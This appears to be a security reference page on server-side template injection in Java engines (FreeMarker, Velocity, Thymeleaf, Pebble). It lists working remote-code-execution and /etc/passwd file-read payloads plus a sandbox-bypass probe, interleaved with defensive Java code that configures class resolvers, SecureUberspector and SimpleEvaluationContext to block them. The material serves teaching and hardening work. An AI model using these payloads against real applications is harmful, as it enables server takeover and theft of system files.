FreeMarker, Velocity & Java Engines

CWE: CWE-1336
Tools: tplmap
Difficulty: 🔴 advanced

FreeMarker (Java)

FreeMarker is commonly used in Java web applications and Spring-based systems.

Exploitation methodology:

  1. RCE via Execute utility:

    <#assign ex="freemarker.template.utility.Execute"?new()>
    ${ex("id")}
  2. Alternative one-liner RCE:

    ${"freemarker.template.utility.Execute"?new()("id")}
  3. RCE via ObjectConstructor:

    <#assign oc="freemarker.template.utility.ObjectConstructor"?new()>
    <#assign rt=oc("java.lang.Runtime")>
    ${rt.getRuntime().exec("id")}
  4. File read:

    <#assign is=oc("java.io.InputStreamReader",oc("java.io.FileInputStream","/etc/passwd"))>
    <#assign br=oc("java.io.BufferedReader",is)>
    <#list 1..5 as _>
    ${br.readLine()!""}
    </#list>
  5. Data model access:

    ${.data_model}
    ${.globals}
    ${.vars}

FreeMarker sandbox bypass:

    ${.version}
    ${"test"?eval}
    <#assign classloader=thread.currentThread().getContextClassLoader()>
    ${classloader.loadClass("java.lang.Runtime")}
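Defensive counterpart, as an added example that is not part of the original page: every FreeMarker payload above goes through the `?new` built-in (Execute and ObjectConstructor are both instantiated with it), and the resolver behind `?new` is a configuration setting. The `Configuration` below sets it to `ALLOWS_NOTHING_RESOLVER` and keeps `?api` off, then renders a normal template and the `?new` probe from the section above to confirm the probe is rejected before any class is loaded. It assumes FreeMarker 2.3.x on the classpath; the class name, template text and data model values are constructed for the example.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;

// Example class (constructed for this page, not FreeMarker's own code).
public class FreeMarkerHardening {

    // Configuration that refuses the ?new built-in entirely and keeps ?api disabled.
    static Configuration hardenedConfiguration() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        // ?new is the primitive behind the Execute / ObjectConstructor payloads:
        // ALLOWS_NOTHING_RESOLVER throws for every class name instead of loading it.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        // ?api hands templates the raw Java object behind a wrapped value; it is off
        // by default, stated explicitly here so a later setting change is visible.
        cfg.setAPIBuiltinEnabled(false);
        return cfg;
    }

    // Renders a template string against a data model and returns the output.
    static String render(Configuration cfg, String source, Map<String, Object> model)
            throws IOException, TemplateException {
        Template t = new Template("inline", new StringReader(source), cfg);
        StringWriter out = new StringWriter();
        t.process(model, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        Configuration cfg = hardenedConfiguration();
        Map<String, Object> model = new HashMap<>();
        model.put("user", "alice"); // constructed sample value

        // Ordinary interpolation keeps working under the hardened configuration.
        System.out.println(render(cfg, "Hello ${user}", model));

        // The ?new probe from this section is rejected by the resolver itself;
        // no class is loaded and no method is called.
        try {
            render(cfg, "<#assign ex=\"freemarker.template.utility.Execute\"?new()>", model);
            System.out.println("UNEXPECTED: ?new was allowed");
        } catch (TemplateException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

The resolver is defence in depth, not the fix: a template whose source is assembled from user input remains a template injection, so the primary control is to keep user data in the data model (`${user}`) and never in the template text. `TemplateClassResolver.SAFER_RESOLVER` is the middle ground when some `?new` use is genuinely needed; it only blocks the known dangerous utility classes.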

Velocity (Java)

Velocity is used in Apache applications and some Java web frameworks.

Exploitation methodology:

  1. RCE via Java Runtime:

    #set($x="")
    #set($rt=$x.class.forName("java.lang.Runtime"))
    #set($chr=$x.class.forName("java.lang.Character"))
    #set($proc=$rt.getRuntime().exec("id"))
    $proc.waitFor()
  2. Simplified RCE (when runtime object is available):

    $class.inspect("java.lang.Runtime").type.getRuntime().exec("id").waitFor()
  3. RCE through ClassLoader:

    #set($cl=$class.class.classLoader)
    $cl.loadClass("java.lang.Runtime").getMethod("exec","".class).invoke($cl.loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")
  4. File read:

    #set($x='')
    #set($file=$x.class.forName('java.io.File'))
    #set($scanner=$x.class.forName('java.util.Scanner'))
    #set($s=$scanner.getConstructor($file).newInstance($file.getConstructor($x.class).newInstance('/etc/passwd')))
    $s.useDelimiter('\A').next()
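Defensive counterpart, as an added example that is not part of the original page: each Velocity payload above pivots through reflection that the template reaches from an ordinary object (`$x.class.forName`, `$class.class.classLoader`, `getMethod(...).invoke(...)`). Velocity ships an introspector, `SecureUberspector`, whose job is to refuse exactly those calls and any method on `java.lang.Class`, `ClassLoader`, `Runtime`, `Thread` and the `java.lang.reflect` package. The engine below is configured with it, renders a normal template, then feeds it the `forName` step from the payload to show that the reference stays unresolved instead of producing a `Class`. It assumes Velocity 1.7 or 2.x; template text and context values are constructed for the example.

```java
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.runtime.RuntimeConstants;

import java.io.StringWriter;

// Example class (constructed for this page, not Velocity's own code).
public class VelocityHardening {

    // Engine whose introspector is the SecureUberspector: templates cannot call
    // Class.forName, getClassLoader, or methods on the restricted classes/packages
    // (java.lang.Class, ClassLoader, Runtime, Thread, System, java.lang.reflect.*).
    static VelocityEngine hardenedEngine() {
        VelocityEngine ve = new VelocityEngine();
        ve.setProperty(RuntimeConstants.UBERSPECT_CLASSNAME,
                "org.apache.velocity.util.introspection.SecureUberspector");
        ve.init();
        return ve;
    }

    // Evaluates a template string against a context and returns the rendered output.
    static String render(VelocityEngine ve, String template, VelocityContext ctx) {
        StringWriter out = new StringWriter();
        ve.evaluate(ctx, out, "inline", template);
        return out.toString();
    }

    public static void main(String[] args) {
        VelocityEngine ve = hardenedEngine();
        VelocityContext ctx = new VelocityContext();
        ctx.put("user", "alice"); // constructed sample value

        // Plain references render as usual.
        System.out.println(render(ve, "Hello $user", ctx));

        // The first hop of the Runtime payload: $x.class.forName(...). The secure
        // introspector reports no permitted method, so $rt is never assigned and the
        // reference is echoed back unresolved (with runtime.references.strict=true the
        // engine throws instead). Either way, no Class object reaches the template.
        String probe = "#set($x=\"\")#set($rt=$x.class.forName(\"java.lang.Runtime\"))[$rt]";
        System.out.println(render(ve, probe, ctx));
    }
}
```

The same property can be set in `velocity.properties` as `runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector`, and the restricted sets are tunable through `introspector.restrict.classes` and `introspector.restrict.packages`. As with FreeMarker, this is a containment layer; user input belongs in the `VelocityContext`, never in the template source.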

Thymeleaf (Java)

RCE via inline expressions:

    [[${#rt.exec('id')}]]

RCE via SpEL:

    ${T(java.lang.Runtime).getRuntime().exec('id')}
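Defensive counterpart, as an added example that is not part of the original page: the SpEL payload above depends on the `T(...)` type-reference operator, which only the full `StandardEvaluationContext` supports. Wherever an application evaluates an expression that contains user input outside Thymeleaf itself (for example a configurable display rule), Spring's `SimpleEvaluationContext` is the right context: it allows property reads on the root object and nothing else, so type references, constructors and bean references fail at evaluation time. The code below reads a property through it and then shows the page's `T(java.lang.Runtime)` prefix being rejected. It assumes `spring-expression` on the classpath; the `Greeting` class and its values are constructed for the example.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

// Example class (constructed for this page, not Spring's or Thymeleaf's own code).
public class SpelHardening {

    // Constructed root object: the only thing expressions are allowed to read from.
    public static class Greeting {
        private final String name = "alice";

        public String getName() {
            return name;
        }
    }

    // Evaluates an expression with a data-binding-only context: property access on the
    // root object works, but T() type references, constructors (new), bean references
    // (@name) and assignment are not available, so the expression cannot reach Runtime.
    static Object evaluate(String expr, Object root) {
        ExpressionParser parser = new SpelExpressionParser();
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        Expression e = parser.parseExpression(expr);
        return e.getValue(ctx, root);
    }

    public static void main(String[] args) {
        Greeting root = new Greeting();

        // Ordinary property binding is unaffected.
        System.out.println(evaluate("name", root));

        // The type-reference step of the payload above fails inside the context;
        // the exception is raised before any method on Runtime is resolved.
        try {
            evaluate("T(java.lang.Runtime).getRuntime()", root);
            System.out.println("UNEXPECTED: type reference was allowed");
        } catch (SpelEvaluationException ex) {
            System.out.println("blocked: " + ex.getMessageCode() + " - " + ex.getMessage());
        }
    }
}
```

For Thymeleaf templates themselves the equivalent rule is structural rather than a context choice: user input must only ever appear as model attributes rendered by `${...}`, never as template source, fragment selectors or view names, because anything that becomes part of the expression text is evaluated with the full context.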

Pebble (Java)

Pebble is a Java templating engine inspired by Twig.

Detection:

    {{ 7*7 }}
    {{ request }}
    {{ beans }}

RCE:

    {% set cmd = 'id' %}
    {% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}
    {{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(bytes) }}